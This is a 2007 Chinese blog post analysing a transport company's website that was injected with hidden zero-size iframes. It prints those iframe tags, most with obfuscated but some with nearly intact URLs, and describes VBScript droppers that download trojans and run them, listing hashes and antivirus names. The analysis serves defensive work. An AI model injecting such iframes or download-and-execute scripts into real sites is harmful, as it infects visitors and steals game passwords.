`
caobihole
  • 浏览: 948806 次
文章分类
社区版块
存档分类
最新评论

某市长运运输集团有限公司网站被挂马Trojan.PSW.JHOnline.fcd等

 
阅读更多

endurer 原创

2007-02-12 第1

该网站首页首部被加入代码:
/--------
<iframe src=hxxp://g***m**06.z**kd**520.cn/k**k*k/wm.htm width=0 height=0></iframe>
<iframe src=hxxp://www.y*x***gm***7*8.com/mh/mh.htm width=0 height=0></iframe>
<iframe src=hxxp://www.y*x***gm***7*8.com/mh/wow.htm width=0 height=0></iframe>
<iframe src=hxxp://www.2***s*s**s*s.com/qq/pop.htm width=0 height=0></iframe>
--------/

中部被加入代码:
/--------
<iframe src=hxxp://ll78.com/qq/2.asp width=0 height=0></iframe>
<iframe src="hxxp://ll78.com/index1.asp" width=0 height=0></iframe>
<iframe src="hxxp://ll78.com/xiao.htm" width=0 height=0></iframe>
--------/

1、hxxp://g***m**06.z**kd**520.cn/kkk/wm.htm

包含有使用escape()加密的VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件1.exe,保存为 %temp%/asde.exe,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行 。
/--------
文件说明符 : d:/test/1.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-11 22:45:52
修改时间 : 2007-2-11 22:45:54
访问时间 : 2007-2-11 0:0:0
大小 : 59121 字节 57.753 KB
MD5 : 42488f09828498af6c511bc1df294791
--------/
Kaspersky报为:Backdoor.Win32.Agent.aex

2、hxxp://www.y*x***gm***7*8.com/mh/mh.htm

包含VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件mh.exe,保存为 %temp%/IE601.com,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。
/--------
文件说明符 : d:/test/mh.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-11 22:50:30
修改时间 : 2007-2-11 22:50:32
访问时间 : 2007-2-11 0:0:0
大小 : 20480 字节 20.0 KB
MD5 : 249bbfd18001ff78d14e0b8d7bfb4596
--------/

采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 加壳

Kaspersky报为:Trojan-PSW.Win32.OnLineGames.fb

Scanned file: mh.exe - Infected

mh.exe - infected by Trojan-PSW.Win32.OnLineGames.fb

Statistics:

Known viruses: 266800 Updated: 11-02-2007
File size (Kb): 20 Virus bodies: 1
Files: 1 Warnings: 0
Archives: 0 Suspicious: 0

瑞星报为:Trojan.PSW.JHOnline.fcd

3、hxxp://www.y*x***gm***7*8.com/mh/wow.htm

包含VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件wow.exe,保存为 %temp%/IE603.com,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。

/--------
文件说明符 : d:/test/wow.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-11 22:50:47
修改时间 : 2007-2-11 22:50:48
访问时间 : 2007-2-11 0:0:0
大小 : 45056 字节 44.0 KB
MD5 : f6d6c2e4bb78416e9e74638be1fc4a8d
--------/


采用BERO加壳
Kaspersky报为:Trojan.Win32.Agent.abf
Dr.Web报为:Trojan.Havedo

hxxp://www.2***s*s**s*s.com/qq/pop.htm
hxxp://l*l***7*8.com/qq/2.asp
hxxp://l*l***7*8.com/index1.asp
hxxp://l*l***7*8.com/xiao.htm

均无法找到该页

分享到:
| 又遇灰鸽子
评论
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

Magicbox
Global site tag (gtag.js) - Google Analytics